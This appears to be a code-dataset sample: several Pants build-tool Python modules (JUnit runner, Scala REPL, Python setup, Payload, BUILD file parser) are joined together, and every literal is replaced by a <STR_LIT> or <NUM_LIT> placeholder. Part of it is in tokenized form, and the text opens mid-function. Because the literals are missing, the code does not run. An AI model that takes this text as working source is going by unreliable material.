                test_class_name = test.partition('<STR_LIT:#>')[<NUM_LIT:0>]
                target = tests_from_targets.get(test_class_name)
                if target is None:
                    unknown_tests.append(test)
                else:
                    tests_with_targets[test] = target
            if len(unknown_tests) > <NUM_LIT:0>:
                raise TaskError("<STR_LIT>" "<STR_LIT>"
                                .format("<STR_LIT>".join(unknown_tests)))
            return tests_with_targets
        else:
            return tests_from_targets

    def _get_failed_targets(self, tests_and_targets):
        """Parse per-class junit XML reports and collect failed tests per target."""

        def get_test_filename(test_class_name):
            # '$' (inner-class separator) is replaced in report filenames.
            return os.path.join(self.workdir, '<STR_LIT>'.format(test_class_name.replace('<STR_LIT:$>', '<STR_LIT:->')))

        # NOTE(review): defaultdict() with no factory behaves like a plain dict.
        xml_filenames_to_targets = defaultdict()
        for test, target in tests_and_targets.items():
            if target is None:
                self.context.log.warn('<STR_LIT>'.format(test))
            # Walk outward through inner classes until a report file is found.
            test_class_name = test
            for _part in test.split('<STR_LIT:$>'):
                filename = get_test_filename(test_class_name)
                if os.path.exists(filename):
                    xml_filenames_to_targets[filename] = target
                    break
                else:
                    test_class_name = test_class_name.rsplit('<STR_LIT:$>', <NUM_LIT:1>)[<NUM_LIT:0>]
        failed_targets = defaultdict(set)
        for xml_filename, target in xml_filenames_to_targets.items():
            try:
                xml = XmlParser.from_file(xml_filename)
                failures = int(xml.get_attribute('<STR_LIT>', '<STR_LIT>'))
                errors = int(xml.get_attribute('<STR_LIT>', '<STR_LIT>'))
                if target and (failures or errors):
                    for testcase in xml.parsed.getElementsByTagName('<STR_LIT>'):
                        test_failed = testcase.getElementsByTagName('<STR_LIT>')
                        test_errored = testcase.getElementsByTagName('<STR_LIT:error>')
                        if test_failed or test_errored:
                            failed_targets[target].add('<STR_LIT>'.format(
                                testclass=testcase.getAttribute('<STR_LIT>'),
                                testname=testcase.getAttribute('<STR_LIT:name>'),
                            ))
            except (XmlParser.XmlError, ValueError) as e:
                # Unparseable/incomplete report: log and keep going.
                self.context.log.error('<STR_LIT>'.format(xml_filename, e))
        return dict(failed_targets)

    def _run_tests(self, tests_to_targets):
        if self._coverage:
            extra_jvm_options = self._coverage.extra_jvm_options
            classpath_prepend = self._coverage.classpath_prepend
            classpath_append = self._coverage.classpath_append
        else:
            extra_jvm_options = []
            classpath_prepend = ()
            classpath_append = ()
        # Group tests so that each JVM invocation shares workdir, platform,
        # jvm options, env vars, concurrency mode and thread count.
        tests_by_properties = self._tests_by_properties(
            tests_to_targets,
            self._infer_workdir,
            lambda target: target.test_platform,
            lambda target: target.payload.extra_jvm_options,
            lambda target: target.payload.extra_env_vars,
            lambda target: target.concurrency,
            lambda target: target.threads
        )
        classpath_product = self.context.products.get_data('<STR_LIT>')
        result = <NUM_LIT:0>
        for properties, tests in tests_by_properties.items():
            (workdir, platform, target_jvm_options, target_env_vars, concurrency, threads) = properties
            for batch in self._partition(tests):
                relevant_targets = set(map(tests_to_targets.get, batch))
                # Ordered: prepend (coverage) + tool + target classpath + append.
                complete_classpath = OrderedSet()
                complete_classpath.update(classpath_prepend)
                complete_classpath.update(self.tool_classpath('<STR_LIT>'))
                complete_classpath.update(self.classpath(relevant_targets,
                                                         classpath_product=classpath_product))
                complete_classpath.update(classpath_append)
                distribution = JvmPlatform.preferred_jvm_distribution([platform], self._strict_jvm_version)
                # Per-batch args: target-level concurrency/threads override the defaults.
                args = self._args + [u'<STR_LIT>']
                if concurrency == junit_tests.CONCURRENCY_SERIAL:
                    args = remove_arg(args, '<STR_LIT>')
                elif concurrency == junit_tests.CONCURRENCY_PARALLEL_CLASSES:
                    args = ensure_arg(args, '<STR_LIT>')
                elif concurrency == junit_tests.CONCURRENCY_PARALLEL_METHODS:
                    # Unsupported per-target mode: warn, leave args unchanged.
                    self.context.log.warn('<STR_LIT>')
                elif concurrency == junit_tests.CONCURRENCY_PARALLEL_BOTH:
                    self.context.log.warn('<STR_LIT>'.format(concurrency))
                    args = ensure_arg(args, '<STR_LIT>')
                    args = ensure_arg(args, '<STR_LIT>')
                if threads is not None:
                    args = remove_arg(args, '<STR_LIT>', has_param=True)
                    args += ['<STR_LIT>', str(threads)]
                with binary_util.safe_args(batch, self.get_options()) as batch_tests:
                    self.context.log.debug('<STR_LIT>'.format(workdir))
                    self.context.log.debug('<STR_LIT>'.format(platform))
                    with environment_as(**dict(target_env_vars)):
                        # abs(): any nonzero exit code accumulates as a failure.
                        result += abs(self._spawn_and_wait(
                            executor=SubprocessExecutor(distribution),
                            distribution=distribution,
                            classpath=complete_classpath,
                            main=JUnitRun._MAIN,
                            jvm_options=self.jvm_options + extra_jvm_options + list(target_jvm_options),
                            args=args + batch_tests,
                            workunit_factory=self.context.new_workunit,
                            workunit_name='<STR_LIT>',
                            workunit_labels=[WorkUnitLabel.TEST],
                            cwd=workdir,
                            synthetic_jar_dir=self.workdir,
                            create_synthetic_jar=self.synthetic_classpath,
                        ))
                    if result != <NUM_LIT:0> and self._fail_fast:
                        break
        if result != <NUM_LIT:0>:
            failed_targets_and_tests = self._get_failed_targets(tests_to_targets)
            failed_targets = sorted(failed_targets_and_tests, key=lambda target: target.address.spec)
            error_message_lines = []
            if self._failure_summary:
                for target in failed_targets:
                    error_message_lines.append('<STR_LIT>'.format('<STR_LIT:U+0020>' * <NUM_LIT:4>, target.address.spec))
                    for test in sorted(failed_targets_and_tests[target]):
                        error_message_lines.append('<STR_LIT>'.format('<STR_LIT:U+0020>' * <NUM_LIT:8>, test))
            error_message_lines.append(
                '<STR_LIT>'
                .format(main=JUnitRun._MAIN, code=result, failed=len(failed_targets),
                        targets=pluralize(len(failed_targets), '<STR_LIT:target>'))
            )
            raise TestFailedTaskError('<STR_LIT:\n>'.join(error_message_lines), failed_targets=list(failed_targets))

    def _infer_workdir(self, target):
        # Per-target cwd wins over the task-level working dir.
        if target.cwd is not None:
            return target.cwd
        return self._working_dir

    def _tests_by_property(self, tests_to_targets, get_property):
        """Group test names by get_property(target), preserving insertion order."""
        properties = defaultdict(OrderedSet)
        for test, target in tests_to_targets.items():
            properties[get_property(target)].add(test)
        return {property: list(tests) for property, tests in properties.items()}

    def _tests_by_properties(self, tests_to_targets, *properties):
        # Group by the tuple of all property values at once.
        def combined_property(target):
            return tuple(prop(target) for prop in properties)

        return self._tests_by_property(tests_to_targets, combined_property)

    def _partition(self, tests):
        """Yield slices of `tests` no larger than the configured batch size.

        NOTE(review): an empty `tests` list would make stride 0 and range() would
        raise ValueError -- callers appear to only pass non-empty groups; confirm.
        """
        stride = min(self._batch_size, len(tests))
        for i in range(<NUM_LIT:0>, len(tests), stride):
            yield tests[i:i + stride]

    def _get_tests_to_run(self):
        # Expand source-file specs into the class names built from that file;
        # pass classname specs through unchanged.  Method suffixes are retained.
        for test_spec in self._tests_to_run:
            src_spec, cls_spec = interpret_test_spec(test_spec)
            if src_spec:
                sourcefile, methodname = src_spec
                for classname in self._classnames_from_source_file(sourcefile):
                    yield classname + methodname
            else:
                classname, methodname = cls_spec
                yield classname + methodname

    def _calculate_tests_from_targets(self, targets):
        """Yield (classname, target) for every classfile on each target's classpath."""
        classpath_products = self.context.products.get_data('<STR_LIT>')
        for target in targets:
            contents = ClasspathUtil.classpath_contents((target,), classpath_products, confs=self.confs)
            for f in contents:
                classname = ClasspathUtil.classname_for_rel_classfile(f)
                if classname:
                    yield (classname, target)

    def _classnames_from_source_file(self, srcfile):
        # Look the source file up in the mapping product by buildroot-relative path.
        relsrc = os.path.relpath(srcfile, get_buildroot())
        source_products = self.context.products.get_data('<STR_LIT>').get(relsrc)
        if not source_products:
            # Best-effort: warn and yield nothing for unmapped sources.
            self.context.log.warn('<STR_LIT>'.format(srcfile))
        else:
            for _, classes in source_products.rel_paths():
                for cls in classes:
                    yield _classfile_to_classname(cls)

    def _test_target_filter(self):
        def target_filter(target):
            return isinstance(target, junit_tests)

        return target_filter

    def _validate_target(self, target):
        # Reject test targets with no sources unless explicitly allowed by option.
        if not target.payload.sources.source_paths and not self.get_options().allow_empty_sources:
            msg = '<STR_LIT>'
            raise TargetDefinitionException(target, msg)

    def _execute(self, targets):
        """Entry point: collect tests, optionally instrument for coverage, run,
        and always emit a coverage report (with the failure attached on error)."""
        tests_and_targets = self._collect_test_targets(self._get_test_targets())
        if not tests_and_targets:
            return

        def compute_complete_classpath():
            return self.classpath(targets)

        # Other tasks may proceed while tests run.
        self.context.release_lock()
        if self._coverage:
            self._coverage.instrument(
                targets, tests_and_targets.keys(), compute_complete_classpath, self.execute_java_for_coverage)

        def _do_report(exception=None):
            if self._coverage:
                self._coverage.report(
                    targets, tests_and_targets.keys(), self.execute_java_for_coverage, tests_failed_exception=exception)

        try:
            self._run_tests(tests_and_targets)
            _do_report(exception=None)
        except TaskError as e:
            # Report with the failure context, then re-raise.
            _do_report(exception=e)
            raise
from __future__ import (absolute_import, division, generators, nested_scopes, print_function,
                        unicode_literals, with_statement)

from pants.backend.jvm.subsystems.scala_platform import ScalaPlatform
from pants.backend.jvm.targets.jar_dependency import JarDependency
from pants.backend.jvm.targets.jar_library import JarLibrary
from pants.backend.jvm.targets.jvm_target import JvmTarget
from pants.backend.jvm.tasks.jvm_task import JvmTask
from pants.backend.jvm.tasks.jvm_tool_task_mixin import JvmToolTaskMixin
from pants.java.distribution.distribution import DistributionLocator
from pants.task.repl_task_mixin import ReplTaskMixin


class ScalaRepl(JvmToolTaskMixin, ReplTaskMixin, JvmTask):
    """Open a Scala REPL over the classpath of the selected JVM targets."""

    # Main class of the REPL runner tool jar registered below.
    _RUNNER_MAIN = '<STR_LIT>'

    @classmethod
    def register_options(cls, register):
        super(ScalaRepl, cls).register_options(register)
        register('<STR_LIT>', default='<STR_LIT>',
                 help='<STR_LIT>')
        cls.register_jvm_tool(register, '<STR_LIT>', classpath=[
            JarDependency(org='<STR_LIT>', name='<STR_LIT>', rev='<STR_LIT>'),
        ], main=ScalaRepl._RUNNER_MAIN)

    @classmethod
    def subsystem_dependencies(cls):
        return super(ScalaRepl, cls).subsystem_dependencies() + (DistributionLocator, ScalaPlatform)

    @classmethod
    def select_targets(cls, target):
        # Only JVM targets and jar libraries contribute to the REPL classpath.
        return isinstance(target, (JarLibrary, JvmTarget))

    def setup_repl_session(self, targets):
        """Assemble the session classpath: runner tool + platform REPL tool + targets."""
        repl_name = ScalaPlatform.global_instance().repl
        return (self.tool_classpath('<STR_LIT>') +
                self.tool_classpath(repl_name, scope=ScalaPlatform.options_scope) +
                self.classpath(targets))

    def launch_repl(self, classpath):
        """Run the REPL in the foreground via the cached JVM distribution."""
        # BUG FIX: copy before mutating.  The original appended directly to the
        # list returned by the `jvm_options` property, mutating state shared
        # with every other consumer of that property (and accumulating the
        # appended flag across calls).
        jvm_options = list(self.jvm_options)
        if not any(opt.startswith('<STR_LIT>') for opt in jvm_options):
            jvm_options.append('<STR_LIT>')
        DistributionLocator.cached().execute_java(classpath=classpath,
                                                  main=ScalaRepl._RUNNER_MAIN,
                                                  jvm_options=jvm_options,
                                                  args=[self.get_options().main] + self.args,
                                                  create_synthetic_jar=True)
# NOTE(review): literals in this corpus are abstracted to <STR_LIT>/<NUM_LIT>
# placeholders; comments describe structure rather than concrete option names.
from __future__ import (absolute_import, division, generators, nested_scopes, print_function,
                        unicode_literals, with_statement)

import os

from pex.fetcher import Fetcher, PyPIFetcher
from pex.http import Context
from pkg_resources import Requirement

from pants.subsystem.subsystem import Subsystem


class PythonSetup(Subsystem):
    """Python build settings: interpreter/tool versions and cache directories."""

    options_scope = '<STR_LIT>'

    @classmethod
    def register_options(cls, register):
        super(PythonSetup, cls).register_options(register)
        register('<STR_LIT>', advanced=True, default='<STR_LIT>',
                 help='<STR_LIT>')
        register('<STR_LIT>', advanced=True, default='<STR_LIT>',
                 help='<STR_LIT>')
        register('<STR_LIT>', advanced=True, default='<STR_LIT>',
                 help='<STR_LIT>')
        register('<STR_LIT>', advanced=True, type=list, default=['<STR_LIT>'],
                 help='<STR_LIT>')
        # Cache-directory options default to None; the corresponding properties
        # below fall back to subdirectories of scratch_dir.
        register('<STR_LIT>', advanced=True, default=None, metavar='<STR_LIT>',
                 help='<STR_LIT>'
                      '<STR_LIT>')
        register('<STR_LIT>', advanced=True, default=None, metavar='<STR_LIT>',
                 help='<STR_LIT>'
                      '<STR_LIT>')
        register('<STR_LIT>', advanced=True, default=None, metavar='<STR_LIT>',
                 help='<STR_LIT>'
                      '<STR_LIT>')
        # TTL default expressed as a product of literals (values elided by corpus).
        register('<STR_LIT>', advanced=True, type=int, metavar='<STR_LIT>',
                 default=<NUM_LIT:10> * <NUM_LIT> * <NUM_LIT>,
                 help='<STR_LIT>'
                      '<STR_LIT>')
        register('<STR_LIT>', advanced=True, default=None, metavar='<STR_LIT>',
                 help='<STR_LIT>'
                      '<STR_LIT>')

    @property
    def interpreter_requirement(self):
        return self.get_options().interpreter_requirement

    @property
    def setuptools_version(self):
        return self.get_options().setuptools_version

    @property
    def wheel_version(self):
        return self.get_options().wheel_version

    @property
    def platforms(self):
        return self.get_options().platforms

    @property
    def interpreter_cache_dir(self):
        # Explicit option wins; otherwise a scratch_dir subdirectory.
        return (self.get_options().interpreter_cache_dir or
                os.path.join(self.scratch_dir, '<STR_LIT>'))

    @property
    def chroot_cache_dir(self):
        return (self.get_options().chroot_cache_dir or
                os.path.join(self.scratch_dir, '<STR_LIT>'))

    @property
    def resolver_cache_dir(self):
        return (self.get_options().resolver_cache_dir or
                os.path.join(self.scratch_dir, '<STR_LIT>'))

    @property
    def resolver_cache_ttl(self):
        return self.get_options().resolver_cache_ttl

    @property
    def artifact_cache_dir(self):
        """Directory for cached artifacts; defaults under scratch_dir."""
        return (self.get_options().artifact_cache_dir or
                os.path.join(self.scratch_dir, '<STR_LIT>'))

    @property
    def scratch_dir(self):
        # One directory level per component of the options scope.
        return os.path.join(self.get_options().pants_workdir, *self.options_scope.split('<STR_LIT:.>'))

    # NOTE: plain methods (not properties), unlike the accessors above.
    def setuptools_requirement(self):
        return self._failsafe_parse('<STR_LIT>'.format(self.setuptools_version))

    def wheel_requirement(self):
        return self._failsafe_parse('<STR_LIT>'.format(self.wheel_version))

    def _failsafe_parse(self, requirement):
        # Older pkg_resources versions lack the `replacement` kwarg; retry
        # without it when the newer signature raises TypeError.
        try:
            return Requirement.parse(requirement, replacement=False)
        except TypeError:
            return Requirement.parse(requirement)


class PythonRepos(Subsystem):
    """Python package repositories and indexes used for resolution."""

    options_scope = '<STR_LIT>'

    @classmethod
    def register_options(cls, register):
        super(PythonRepos, cls).register_options(register)
        register('<STR_LIT>', advanced=True, type=list, default=[],
                 help='<STR_LIT>')
        register('<STR_LIT>', advanced=True, type=list,
                 default=['<STR_LIT>'],
                 help='<STR_LIT>')

    @property
    def repos(self):
        return self.get_options().repos

    @property
    def indexes(self):
        return self.get_options().indexes

    def get_fetchers(self):
        """Build pex fetchers: one Fetcher per repo, one PyPIFetcher per index."""
        fetchers = []
        fetchers.extend(Fetcher([url]) for url in self.repos)
        fetchers.extend(PyPIFetcher(url) for url in self.indexes)
        return fetchers

    def get_network_context(self):
        return Context.get()
from __future__ import (absolute_import, division, generators, nested_scopes, print_function,
                        unicode_literals, with_statement)

from hashlib import sha1


class PayloadFieldAlreadyDefinedError(Exception):
    """Raised by add_field when the key is already present."""
    pass


class PayloadFrozenError(Exception):
    """Raised by add_field after the payload has been frozen."""
    pass


class Payload(object):
    """A keyed collection of PayloadField-like objects with memoized fingerprints.

    Fields may be added until freeze() is called; fingerprints over any subset of
    field keys are memoized per frozenset of keys.
    """

    def __init__(self):
        self._fields = {}
        self._frozen = False
        # Memoized fingerprints, keyed by frozenset of field keys.
        self._fingerprint_memo_map = {}

    @property
    def fields(self):
        return self._fields.items()

    def freeze(self):
        """Disallow any further add_field calls."""
        self._frozen = True

    def get_field(self, key, default=None):
        """Return the field object stored under `key`, or `default` if absent."""
        return self._fields.get(key, default)

    def get_field_value(self, key, default=None):
        """Return the `.value` of the field under `key`.

        Falls back to `default` when the key is absent or the stored field is falsy.
        """
        if key in self._fields:
            payload_field = self._fields[key]
            if payload_field:
                return payload_field.value
        return default

    def add_fields(self, field_dict):
        """Add every (key, field) pair in `field_dict`."""
        for key, field in field_dict.items():
            self.add_field(key, field)

    def add_field(self, key, field):
        """Add a single field.

        Raises PayloadFieldAlreadyDefinedError on a duplicate key and
        PayloadFrozenError when the payload is frozen.
        """
        if key in self._fields:
            raise PayloadFieldAlreadyDefinedError(
                '<STR_LIT>'
                '<STR_LIT>'
                .format(key=key, existing_field=self._fields[key], field=field))
        elif self._frozen:
            raise PayloadFrozenError(
                '<STR_LIT>'
                .format(key=key))
        else:
            self._fields[key] = field
            # BUG FIX: this previously wrote `self._fingerprint_memo = None`, an
            # attribute nothing reads (memoization lives in
            # `_fingerprint_memo_map`) -- a leftover from an earlier scheme.
            # Invalidate the real memo map instead, mirroring mark_dirty(), so
            # memoized fingerprints can never go stale after a field is added.
            self._fingerprint_memo_map = {}

    def fingerprint(self, field_keys=None):
        """Return a combined fingerprint over `field_keys` (default: all fields).

        Memoized per frozenset of keys; returns None when no field contributes a hash.
        """
        field_keys = frozenset(field_keys or self._fields.keys())
        if field_keys not in self._fingerprint_memo_map:
            self._fingerprint_memo_map[field_keys] = self._compute_fingerprint(field_keys)
        return self._fingerprint_memo_map[field_keys]

    def _compute_fingerprint(self, field_keys):
        # Sorted iteration makes the combined hash independent of insertion order.
        hasher = sha1()
        empty_hash = True
        for key in sorted(field_keys):
            field = self._fields[key]
            if field is not None:
                fp = field.fingerprint()
                if fp is not None:
                    empty_hash = False
                    hasher.update(sha1(key).hexdigest())
                    hasher.update(fp)
        if empty_hash:
            return None
        else:
            return hasher.hexdigest()

    def mark_dirty(self):
        """Drop all memoized fingerprints and propagate dirtiness to each field."""
        self._fingerprint_memo_map = {}
        for field in self._fields.values():
            field.mark_dirty()

    def __getattr__(self, attr):
        # NOTE(review): raises KeyError (not AttributeError) for unknown keys --
        # pre-existing behavior, deliberately preserved for compatibility.
        field = self._fields[attr]
        if field is not None:
            return field.value
        else:
            return None

    def __hasattr__(self, attr):
        # NOTE(review): __hasattr__ is not part of Python's data model and is
        # never invoked by hasattr(); kept only for any direct callers.
        return attr in self._fields
from __future__ import (absolute_import, division, generators, nested_scopes, print_function,
                        unicode_literals, with_statement)

import logging
import warnings

import six

logger = logging.getLogger(__name__)


class BuildFileParser(object):
    """Parses BUILD files into maps of address -> addressable instance."""

    class BuildFileParserError(Exception):
        """Base class for all errors raised by this parser."""
        pass

    class BuildFileScanError(BuildFileParserError):
        """Raised when scanning for BUILD files fails."""
        pass

    class AddressableConflictException(BuildFileParserError):
        """Raised when one BUILD file registers the same address twice."""
        pass

    class SiblingConflictException(BuildFileParserError):
        """Raised when two sibling BUILD files register the same address."""
        pass

    class ParseError(BuildFileParserError):
        """Raised when a BUILD file fails to compile."""

    class ExecuteError(BuildFileParserError):
        """Raised when executing a compiled BUILD file fails."""

    def __init__(self, build_configuration, root_dir):
        self._build_configuration = build_configuration
        self._root_dir = root_dir

    @property
    def root_dir(self):
        return self._root_dir

    def registered_aliases(self):
        """Expose the build configuration's registered aliases."""
        return self._build_configuration.registered_aliases()

    def address_map_from_build_files(self, build_files):
        # Flatten the per-build-file maps into a single address -> addressable map.
        family_address_map_by_build_file = self.parse_build_files(build_files)
        address_map = {}
        for build_file, sibling_address_map in family_address_map_by_build_file.items():
            address_map.update(sibling_address_map)
        return address_map

    def parse_build_files(self, build_files):
        """Parse each BUILD file, rejecting addresses duplicated across siblings.

        NOTE(review): the duplicate scan is O(files * addresses) -- quadratic in
        the number of sibling files, acceptable for typical family sizes.
        """
        family_address_map_by_build_file = {}
        for bf in build_files:
            bf_address_map = self.parse_build_file(bf)
            for address, addressable in bf_address_map.items():
                for sibling_build_file, sibling_address_map in family_address_map_by_build_file.items():
                    if address in sibling_address_map:
                        raise self.SiblingConflictException(
                            "<STR_LIT>"
                            "<STR_LIT>"
                            .format(conflicting_file=sibling_build_file,
                                    addressable_file=address.build_file,
                                    target_name=address.target_name))
            family_address_map_by_build_file[bf] = bf_address_map
        return family_address_map_by_build_file

    def parse_build_file(self, build_file):
        """Compile and execute one BUILD file; return its address -> addressable map.

        Raises ParseError on compile failure, ExecuteError on execution failure,
        and AddressableConflictException on duplicate addresses within the file.
        """

        def _format_context_msg(lineno, offset, error_type, message):
            """Render a few source lines around `lineno`, starred, with the error
            message placed under the offending line (caret-aligned when an
            `offset` column is available)."""
            build_contents = build_file.source().decode('<STR_LIT:utf-8>')
            context = "<STR_LIT>".format(build_file=build_file)
            curr_lineno = <NUM_LIT:0>
            for line in build_contents.split('<STR_LIT:\n>'):
                # Re-encode so non-ascii characters can't break the message itself.
                line = line.encode('<STR_LIT:ascii>', '<STR_LIT>')
                curr_lineno += <NUM_LIT:1>
                if curr_lineno == lineno:
                    highlight = '<STR_LIT:*>'
                else:
                    highlight = '<STR_LIT:U+0020>'
                # Show a window of lines around the error line.
                if curr_lineno >= lineno - <NUM_LIT:3>:
                    context += "<STR_LIT>".format(
                        highlight=highlight, line=line, curr_lineno=curr_lineno)
                    if lineno == curr_lineno:
                        if offset:
                            context += ("<STR_LIT>"
                                        .format(caret="<STR_LIT>", width=int(offset), error_type=error_type,
                                                message=message))
                        else:
                            context += ("<STR_LIT>"
                                        .format(error_type=error_type, message=message))
                if curr_lineno > lineno + <NUM_LIT:3>:
                    break
            return context

        logger.debug("<STR_LIT>"
                     .format(build_file=build_file))
        try:
            build_file_code = build_file.code()
        except SyntaxError as e:
            # Syntax errors carry a location we can render context for.
            raise self.ParseError(_format_context_msg(e.lineno, e.offset, e.__class__.__name__, e))
        except Exception as e:
            raise self.ParseError("<STR_LIT>"
                                  .format(error_type=e.__class__.__name__,
                                          message=e, build_file=build_file))
        parse_state = self._build_configuration.initialize_parse_state(build_file)
        try:
            # Capture warnings raised during execution and log them with context.
            with warnings.catch_warnings(record=True) as warns:
                six.exec_(build_file_code, parse_state.parse_globals)
                for warn in warns:
                    logger.warning(_format_context_msg(lineno=warn.lineno,
                                                       offset=None,
                                                       error_type=warn.category.__name__,
                                                       message=warn.message))
        except Exception as e:
            raise self.ExecuteError("<STR_LIT>"
                                    .format(message=e, build_file=build_file))
        address_map = {}
        for address, addressable in parse_state.registered_addressable_instances:
            logger.debug('<STR_LIT>'
                         .format(addressable=addressable,
                                 address=address))
            if address in address_map:
                raise self.AddressableConflictException(
                    "<STR_LIT>"
                    .format(conflicting_file=address.build_file,
                            target_name=address.target_name))
            address_map[address] = addressable
        logger.debug("<STR_LIT>"
                     .format(build_file=build_file))
        for address, addressable in address_map.items():
            logger.debug("<STR_LIT>"
                         .format(address=address,
                                 addressable=addressable))
        return address_map
<s> from __future__ import ( absolute_import , division , generators , nested_scopes , print_function , <EOL> unicode_literals , with_statement ) <EOL> from pants . base . exceptions import TaskError <EOL> from pants . pantsd . process_manager import ProcessManager <EOL> from pants . pantsd . subsystem . pants_daemon_launcher import PantsDaemonLauncher <EOL> from pants . task . task import Task <EOL> class PantsDaemonKill ( Task ) : <EOL> """<STR_LIT>""" <EOL> def execute ( self ) : <EOL> try : <EOL> PantsDaemonLauncher . global_instance ( ) . terminate ( ) <EOL> except ProcessManager . NonResponsiveProcess as e : <EOL> raise TaskError ( '<STR_LIT>' . format ( e ) ) </s>
<s> from __future__ import ( absolute_import , division , generators , nested_scopes , print_function , <EOL> unicode_literals , with_statement ) <EOL> from abc import abstractproperty <EOL> from pants . util . meta import AbstractClass <EOL> from pants . util . objects import datatype <EOL> class Selector ( AbstractClass ) : <EOL> @ abstractproperty <EOL> def optional ( self ) : <EOL> """<STR_LIT>""" <EOL> class Select ( datatype ( '<STR_LIT>' , [ '<STR_LIT>' , '<STR_LIT>' ] ) , Selector ) : <EOL> """<STR_LIT>""" <EOL> def __new__ ( cls , product , optional = False ) : <EOL> return super ( Select , cls ) . __new__ ( cls , product , optional ) <EOL> class SelectVariant ( datatype ( '<STR_LIT>' , [ '<STR_LIT>' , '<STR_LIT>' ] ) , Selector ) : <EOL> """<STR_LIT>""" <EOL> optional = False <EOL> class SelectDependencies ( datatype ( '<STR_LIT>' , [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] ) , Selector ) : <EOL> """<STR_LIT>""" <EOL> def __new__ ( cls , product , deps_product , field = None ) : <EOL> return super ( SelectDependencies , cls ) . __new__ ( cls , product , deps_product , field ) <EOL> optional = False <EOL> class SelectProjection ( datatype ( '<STR_LIT>' , [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] ) , Selector ) : <EOL> """<STR_LIT>""" <EOL> optional = False <EOL> class SelectLiteral ( datatype ( '<STR_LIT>' , [ '<STR_LIT>' , '<STR_LIT>' ] ) , Selector ) : <EOL> """<STR_LIT>""" <EOL> optional = False </s>
<s> from __future__ import ( absolute_import , division , generators , nested_scopes , print_function , <EOL> unicode_literals , with_statement ) <EOL> from contextlib import closing <EOL> from six import StringIO <EOL> class Manifest ( object ) : <EOL> """<STR_LIT>""" <EOL> @ staticmethod <EOL> def _wrap ( text ) : <EOL> text = text . encode ( '<STR_LIT:ascii>' ) <EOL> with closing ( StringIO ( text ) ) as fp : <EOL> yield fp . read ( <NUM_LIT> ) <EOL> while True : <EOL> chunk = fp . read ( <NUM_LIT> ) <EOL> if not chunk : <EOL> return <EOL> yield '<STR_LIT>' . format ( chunk ) <EOL> PATH = '<STR_LIT>' <EOL> MANIFEST_VERSION = '<STR_LIT>' <EOL> CREATED_BY = '<STR_LIT>' <EOL> MAIN_CLASS = '<STR_LIT>' <EOL> CLASS_PATH = '<STR_LIT>' <EOL> def __init__ ( self , contents = '<STR_LIT>' ) : <EOL> self . _contents = contents . strip ( ) . encode ( '<STR_LIT:ascii>' ) <EOL> def addentry ( self , header , value ) : <EOL> if len ( header ) > <NUM_LIT> : <EOL> raise ValueError ( '<STR_LIT>' . format ( header ) ) <EOL> if self . _contents : <EOL> self . _contents += '<STR_LIT:\n>' <EOL> self . _contents += '<STR_LIT:\n>' . join ( self . _wrap ( '<STR_LIT>' . format ( header = header , value = value ) ) ) <EOL> def contents ( self ) : <EOL> padded = self . _contents + '<STR_LIT:\n>' <EOL> return padded . encode ( '<STR_LIT:ascii>' ) <EOL> def is_empty ( self ) : <EOL> if self . _contents . strip ( ) : <EOL> return False <EOL> return True </s>
<s> from __future__ import ( absolute_import , division , generators , nested_scopes , print_function , <EOL> unicode_literals , with_statement ) <EOL> import logging <EOL> import select <EOL> from pants . pantsd . pailgun_server import PailgunServer <EOL> from pants . pantsd . service . pants_service import PantsService <EOL> class PailgunService ( PantsService ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , bind_addr , exiter_class , runner_class ) : <EOL> """<STR_LIT>""" <EOL> super ( PailgunService , self ) . __init__ ( ) <EOL> self . _logger = logging . getLogger ( __name__ ) <EOL> self . _bind_addr = bind_addr <EOL> self . _exiter_class = exiter_class <EOL> self . _runner_class = runner_class <EOL> self . _pailgun = None <EOL> @ property <EOL> def pailgun ( self ) : <EOL> if not self . _pailgun : <EOL> self . _pailgun = self . _setup_pailgun ( ) <EOL> return self . _pailgun <EOL> @ property <EOL> def pailgun_port ( self ) : <EOL> return self . pailgun . server_port <EOL> def _setup_pailgun ( self ) : <EOL> """<STR_LIT>""" <EOL> def runner_factory ( sock , arguments , environment ) : <EOL> exiter = self . _exiter_class ( sock ) <EOL> return self . _runner_class ( sock , exiter , arguments , environment ) <EOL> return PailgunServer ( self . _bind_addr , runner_factory ) <EOL> def run ( self ) : <EOL> """<STR_LIT>""" <EOL> self . _logger . info ( '<STR_LIT>' . format ( self . pailgun_port ) ) <EOL> try : <EOL> while not self . is_killed : <EOL> self . pailgun . handle_request ( ) <EOL> except select . error : <EOL> self . _logger . warning ( '<STR_LIT>' ) <EOL> def terminate ( self ) : <EOL> """<STR_LIT>""" <EOL> if self . pailgun : <EOL> self . pailgun . server_close ( ) <EOL> super ( PailgunService , self ) . terminate ( ) </s>
<s> from __future__ import ( absolute_import , division , generators , nested_scopes , print_function , <EOL> unicode_literals , with_statement ) <EOL> import logging <EOL> from pants . task . changed_file_task_mixin import ChangedFileTaskMixin <EOL> from pants . task . noop_exec_task import NoopExecTask <EOL> logger = logging . getLogger ( __name__ ) <EOL> class ChangedTargetTask ( ChangedFileTaskMixin , NoopExecTask ) : <EOL> """<STR_LIT>""" <EOL> @ classmethod <EOL> def register_options ( cls , register ) : <EOL> super ( ChangedTargetTask , cls ) . register_options ( register ) <EOL> cls . register_change_file_options ( register ) <EOL> @ classmethod <EOL> def alternate_target_roots ( cls , options , address_mapper , build_graph ) : <EOL> change_calculator = cls . change_calculator ( <EOL> options , <EOL> address_mapper , <EOL> build_graph ) <EOL> changed_addresses = change_calculator . changed_target_addresses ( ) <EOL> readable = '<STR_LIT>' . join ( sorted ( '<STR_LIT>' . format ( addr . reference ( ) ) for addr in changed_addresses ) ) <EOL> logger . info ( '<STR_LIT>' . format ( len ( changed_addresses ) , readable ) ) <EOL> return [ build_graph . get_target ( addr ) for addr in changed_addresses ] </s>
<s> from __future__ import ( absolute_import , division , generators , nested_scopes , print_function , <EOL> unicode_literals , with_statement ) <EOL> import sys <EOL> v = sys . version_info <EOL> print ( '<STR_LIT>' % v [ <NUM_LIT:0> : <NUM_LIT:3> ] ) <EOL> def say_hello ( ) : <EOL> print ( '<STR_LIT>' ) </s>
